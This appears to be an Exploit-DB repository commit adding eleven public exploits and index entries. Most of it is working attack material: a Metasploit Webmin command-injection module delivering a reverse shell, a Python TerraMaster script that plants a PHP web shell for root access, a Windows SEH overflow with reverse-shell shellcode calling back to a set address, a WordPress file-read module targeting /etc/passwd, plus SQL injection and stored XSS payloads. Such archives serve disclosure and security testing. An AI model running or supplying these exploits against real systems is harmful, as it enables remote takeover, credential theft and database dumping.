DB: 2020-12-23

12 changes to exploits/shellcodes

10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
Victor CMS 1.0 - File Upload To RCE
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
CSE Bookstore 1.0 - Multiple SQL Injection
Library Management System 3.0 - _Add Category_ Stored XSS
Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)
Artworks Gallery Management System 1.0 - 'id' SQL Injection
Faculty Evaluation System 1.0 - Stored XSS
TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
This commit is contained in:
Offensive Security 2020-12-23 05:01:59 +00:00
parent cd30696d15
commit 3aeb1a0d81
13 changed files with 739 additions and 0 deletions

165
exploits/linux/webapps/49318.rb Executable file
View file

@ -0,0 +1,165 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.962 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
It emerged by circumventing the measure taken for CVE-2019-12840.
s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
Therefore, since the package name variable is placed directly in the system command,
we can manipulate it using some escape characters that HTTP supports.
For example, we can escape control by dropping the command line down one line.
We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
we must add double an ampersand(&&) to the end of the payload (%26%26)
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2020-35606'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'RPORT' => 10000,
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_perl'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [['Webmin <= 1.962', {}]],
'DisclosureDate' => '2020-12-21',
'DefaultTarget' => 0)
)
register_options [
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1', # it must be used for "Error - No cookies"
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD']
}
})
if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
return $1
end
return nil unless res
''
end
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
# check version
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
'cookie' => "sid=#{cookie}",
'vars_get' => { "xnavigation" => "1" }
})
if res && res.code == 302 && res.body
version = res.body.split("Webmin 1.")[1]
return CheckCode::Detected if version.nil?
version = version.split(" ")[0]
if version <= "962"
# check package update priv
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "package-updates/"),
'cookie' => "sid=#{cookie}"
})
if res && res.code == 200 && res.body =~ /Software Package Update/
print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
return CheckCode::Vulnerable
end
end
end
print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
def exploit
cookie = login
if cookie == '' || cookie.nil?
fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
end
print_good("Session cookie: #{cookie}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
'cookie' => "sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
run_update(cookie)
end
def run_update(cookie)
@b64p = Rex::Text.encode_base64(payload.encoded)
perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
payload = Rex::Text.uri_encode(perl_payload)
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "sid=#{cookie}",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
'headers' =>
{
'Referer' => "#{peer}/package-updates/?xnavigation=1"
},
# new vector // bypass to backslash %0A%7C{}%26%26
'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
# for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
})
end
end

66
exploits/linux/webapps/49321.py Executable file
View file

@ -0,0 +1,66 @@
# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
# Date: 12/12/2020
# Exploit Author: IHTeam
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
# Vendor Homepage: https://www.terra-master.com/
# Version: <= 4.2.06
# Tested on: 4.1.30, 4.2.06
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
args = parser.parse_args()
url = args.url
headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
epoch_time = int(time.time())
shell_filename = "debug"+str(epoch_time)+".php"
def check_endpoint(url, headers):
response = requests.get(url+'/version', headers=headers, verify=False)
if response.status_code == 200:
print("[+] TerraMaster TOS version: ", str(response.content))
else:
print("\n[-] TerraMaster TOS response code: ", response.status_code)
sys.exit()
def upload_shell(url, headers, shell_filename):
payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
payload = urllib.parse.quote(payload, safe='')
print("[/] Uploading shell...")
response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
time.sleep(1)
response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
print("[+] Upload succeeded")
else:
print("\n[-] Error uploading shell: ", response.content)
sys.exit()
def interactive_shell(url, headers, shell_filename, cmd):
response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
print(str(response.text)+"\n")
def delete_shell(url, headers, shell_filename):
delcmd = "rm /usr/www/"+shell_filename
response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
print("\n[+] Shell deleted")
check_endpoint(url, headers)
upload_shell(url, headers, shell_filename)
try:
while True:
cmd = input("# ")
interactive_shell(url, headers, shell_filename, cmd)
except:
delete_shell(url, headers, shell_filename)

View file

@ -4,6 +4,7 @@
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================

View file

@ -0,0 +1,19 @@
# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Date: 20.12.2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Apache2/Linux
Step1: register http://localhost/CMSsite-master/register.php
step2: login as user
step3: Go to Profile
step4: upload imag as php file (upload shell.php)
step5: update user
step6: You will find your shell in img folder :/path/img/cmd.php
http://localhost/CMSsite-master/img/cmd.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

View file

@ -0,0 +1,82 @@
# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv
# POC
POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"
300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"
3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"
on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"
Next
-----------------------------308827614039434535382911921119--

View file

@ -0,0 +1,110 @@
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date : 2020-12-21
# Author : Musyoka Ian
# Version : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform : PHP
# Tested on : Debian
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
Below is results returned by SQLMap
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
POC 1
REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
POC 2
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
REQUEST
=======
POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
POC 3.
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1

View file

@ -0,0 +1,20 @@
# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage: https://otsglobal.org/
# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
# Affected Version: 3.0
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as Admin.
Step 2. Select "Book" from menu and select "Categories" from sub menu and
after that click on "Add Category".
Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name"
Step 4. Now Click on "Save" , Go to "Category" and See last , there you
will get alert box.

View file

@ -0,0 +1,18 @@
# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-21
# Google Dork: N/A
# Vendor Homepage: https://www.ramomcoder.com/
# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
# Affected Version: 3.5
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as Super Admin.
Step 2. Select "Branch" from menu and after that click on "Create Branch".
Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" ,
"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
Step 4. Now Click on "Save" and you will get a list of alert boxes.

86
exploits/php/webapps/49317.rb Executable file
View file

@ -0,0 +1,86 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in WordPress plugin
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
the web server privileges.
},
'References' =>
[
['CVE', '2019-6715'],
['WPVDB', '9248'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
],
'Author' =>
[
'VinhJAXT', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => '2014-09-20',
'License' => MSF_LICENSE
)
)
register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
]
)
end
def check
check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ %r{^/}
json_body = { 'Type' => "SubscriptionConfirmation",
'Message' => '',
'SubscribeURL' => "file:///#{traversal}#{filename}"
}
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
fail_with Failure::Unreachable, 'Connection failed' unless res
fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'w3_total_cache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end

View file

@ -0,0 +1,64 @@
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Tested on Kali Linux
Step 1. Log in to the application with admin credentials.
Step 2. Click on "Explore" and then select "Artworks".
Step 3. Choose any item, the URL should be "
http://localhost/art-bay/info_art.php?id=6
Step 4. Run sqlmap on the URL where the "id" parameter is given
sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 4531=4531
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=8 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
-
---
[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---
Step 5. Sqlmap should inject the web-app successfully which leads to
information disclosure.

View file

@ -0,0 +1,19 @@
# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
# Exploit Author: Vijay Sachdeva (pwnshell)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
# Tested on Kali Linux
Step 1: Log in to the application with admin credentials
Step 2: Click on Questionnaires, then click "Action" for any Academic Year
and then click manage.
Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of
the Question form.
Step 4. Click on "Save" when done and this will trigger the Stored XSS
payloads. Whenever you click on Questionnaires, click action for any
academic year, and then manage, your XSS Payloads will be triggered for
that "Academic Year"

78
exploits/windows/local/49322.py Executable file
View file

@ -0,0 +1,78 @@
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
# Date: 2020-12-22
# Exploit Author: Florian Gassner
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.05
# Tested on: Windows 10 x64
# Computer -> From Text File -> Choose exploit.txt
import struct
"""
Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
"""
OFFSET = 214
"""
badchars = '\x00\x09\x0a\x0d\x3a\x5c'
"""
"""
Log data, item 23
Address=01015AF4
Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
"""
pop_pop_ret = struct.pack("<I", 0x01015af4)
short_jump = '\xEB\x06\x90\x90'
"""
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
"""
shellcode = ""
shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
payload = 'A' * (OFFSET - len(short_jump))
payload += short_jump
payload += pop_pop_ret
payload += '\x90' * 8
payload += shellcode
f = open("exploit.txt", "w")
f.write(payload)
f.close()

View file

@ -11232,6 +11232,7 @@ id,file,description,date,author,type,platform,port
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43524,3 +43525,13 @@ id,file,description,date,author,type,platform,port
49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php,
49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,
49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux,

Can't render this file because it is too large.